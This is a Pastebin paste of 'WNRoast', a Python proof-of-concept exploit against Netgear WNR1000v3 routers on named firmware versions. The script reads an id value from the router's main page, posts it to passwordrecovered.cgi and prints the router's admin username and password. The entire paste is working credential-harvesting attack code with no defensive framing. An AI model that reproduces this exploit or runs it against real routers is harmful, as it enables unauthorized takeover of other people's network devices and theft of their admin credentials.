Advertisement
Guest User

wnroast.py

a guest
Jun 15th, 2014
2,191
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ######################################################################################
  2. # WNRoast Version 1.0 #
  3. # Netgear WNR1000v3 Credential Harvesting Exploit (Proof of Concept) #
  4. # Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA #
  5. # By: c1ph04 #
  6. # #
  7. # Not the prettiest, but I need to get this done before the baby wakes up #
  8. ######################################################################################
  9.  
  10. import socket
  11. import urllib
  12. import urllib2
  13. import sys
  14.  
  15. CRLF = "\r\n"
  16.  
  17. request = [
  18. "GET / HTTP/1.1",
  19. "Host: none",
  20. "Connection: Close",
  21. "",
  22. "",
  23. ]
  24. #---------------------------------------------------
  25.  
  26. s = socket.socket()
  27. s.connect((sys.argv[1], int(sys.argv[2])))
  28.  
  29. s.send(CRLF.join(request))
  30.  
  31. response = ''
  32. buffer = s.recv(4096)
  33. while buffer:
  34. response += buffer
  35. buffer = s.recv(4096)
  36.  
  37. header_data, _, body = response.partition(CRLF + CRLF)
  38.  
  39. #-----------------------------------------------------
  40.  
  41. def extract_between(text, sub1, sub2, nth=1):
  42.  
  43. if sub2 not in text.split(sub1, nth)[-1]:
  44. return None
  45. return text.split(sub1, nth)[-1].split(sub2, nth)[0]
  46.  
  47. text = body
  48.  
  49. uid = (repr(extract_between(text, 'id=', '\"')))
  50.  
  51. uid = uid.replace("\'", '')
  52.  
  53. #-----------------------------------------------------
  54.  
  55. # Send POST To Get Credentials
  56.  
  57. ip = sys.argv[1]
  58.  
  59. ip = ip.replace("\'", '')
  60.  
  61. port = sys.argv[2]
  62.  
  63. port = port.replace("\'", '')
  64.  
  65. url = 'http://' + ip + ':' + port + '/passwordrecovered.cgi?id=' + uid
  66.  
  67. data = ''
  68. req = urllib2.Request(url, data)
  69. response = urllib2.urlopen(req)
  70. the_page = response.read()
  71.  
  72. #-------------------------------------------------------
  73.  
  74. username = (repr(extract_between(the_page, 'Router Admin Username</td>', '</td>')))
  75. username = (repr(extract_between(username, '>', '\'')))
  76. username = username.replace("\'", '')
  77.  
  78. password = (repr(extract_between(the_page, 'Router Admin Password</td>', '</td>')))
  79. password = (repr(extract_between(password, '>', '\'')))
  80. password = password.replace("\'", '')
  81.  
  82. print """
  83.  
  84. WNRoast Version 1.0
  85. =========================
  86. By: c1ph04
  87.  
  88. """
  89. print "\n WNRoasted!\n"
  90. print " Username is: " + username + '\n'
  91. print " Password is: " + password
Advertisement
RAW Paste Data Copied
Advertisement